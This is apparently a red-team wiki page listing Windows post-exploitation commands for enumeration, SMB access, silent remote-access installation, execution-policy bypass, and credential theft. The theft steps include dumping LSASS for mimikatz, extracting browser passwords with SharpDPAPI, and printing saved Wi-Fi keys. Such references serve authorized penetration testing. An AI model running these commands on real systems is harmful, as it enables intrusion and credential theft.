Comment on page
Windows

General
Check for additional drives
get-psdrive //powershell
show_mount // meterpreter
wmic logicaldisk get name|caption //wmic
Seatbelt MappedDrives // seatbelt
List installed programs
reg query HKEY_LOCAL_MACHINE\SOFTWARE
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Check linux subsystem
C:\Users\<name>\AppData\Local\Packages\CanonicalGroup...
Search writeable directories
dir /a-r-d /s /b
Search files by name
dir /s *foo*
Search Files by content
findstr /s /i <needle> *.*
Search Files by owner
dir c:\*.* /S /Q|FIND /i "owner"
Search files in meterpreter
search -f *.<ext>`
Search for alternate data streams (ads)
dir /s /R /a
Check named pipes in PowerShell
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
Grep file contents in PowerShell
Select-String -Path <path> -Pattern <pattern> | out-host -paging
Enumerate SMB
smbmap -R -H \\<ip>
smbclient -L \\<ip> -N
smbclient \\<ip>\share -U <user>
smbget -R <ip>
Grant permissions with icacls
icacls <filename> /grant <username>(OI)(CI)F /T
Search registry
reg query HKLM /s | findstr /i <item>
reg query HKCU /s | findstr /i <item>
reg query HKLM /f <item> /t REG_SZ /s
reg query HKCU /f <item> /t REG_SZ /s
Print wlan keys
netsh wlan show profile <name> key=clear
PowerShell port scan
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<ip>",$_)) "Port $_ is open!"} 2>$null
Get User SID
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"
Deploy TightVNC
msiexec /i "tightvnc.msi" /quiet /norestart ADDLOCAL="Server,Viewer" VIEWER_ASSOCIATE_VNC_EXTENSION=1 SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 VIEWER_ADD_FIREWALL_EXCEPTION=1 SERVER_ALLOW_SAS=1 SET_USEVNCAUTHENTICATION=1 VALUE_OF_USEVNCAUTHENTICATION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=PASSWORD SET_USECONTROLAUTHENTICATION=1 VALUE_OF_USECONTROLAUTHENTICATION=1 SET_CONTROLPASSWORD=1 VALUE_OF_CONTROLPASSWORD=PASSWORD
Grep Registry for Keywords:
reg query HKLM /s /f <keyword> (try HKLM/HKCU)
Find Files by Date
forfiles /P C:\ /S /D 10/24/2020 /C "cmd /c echo @PATH"
Bypass Execution Policy (for domain users) by changing registry as local administrator
HKLM:\Software\Policies\Microsoft\Windows\PowerShell # change value to bypass
Useful Commands in Rpcclient
rpcclient -U <user> <ip>
lookupnames <name>
lookupsids <sid>
Dumping Processes
procdump.exe -accepteula -ma <pid>
We can also use a short custom program to avoid using procdump.
If we dump lsass, this dump can be read using mimikatz:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Credentials
Check for stored credentials:
cmdkey /list
Company Files
This lead to success on numerous occasions. While not technical make sure you look at the files that are on the system. This includes configuration backups, documents, notes, technical documentation and more.
Invoke-PrivescCheck
Great Script to collection information about the host and possible EoP Paths.
Seatbelt
Good Host Enumeration Tool: https://github.com/GhostPack/Seatbelt.
Seatbelt -group=all -full
SharpDPAPI
Get Passwords from Chrome & Windows via https://github.com/GhostPack/SharpDPAPI.
SharpDPAPI triage
Check for running services
sc query
sc query <>
sc qc <>
reg query HKLM\SYSTEM\CurrentControlSet\Services
SMBClient
List Shares
smbclient -L \\<ip> -U anonymous
Connect to Share
Without credentials:
smbclient \\server\\sharename -U "" -N
With credentials:
smbclient \\server\\sharename -U domain\user
Other
Usually you want to run the scripts/tools from the Privilege Escalation Section. Other than that these are interesting as well:
Screenshot
Keylogger
Red Team - Previous
Host Enum
Next - Red Team
Payloads
Last modified 9mo ago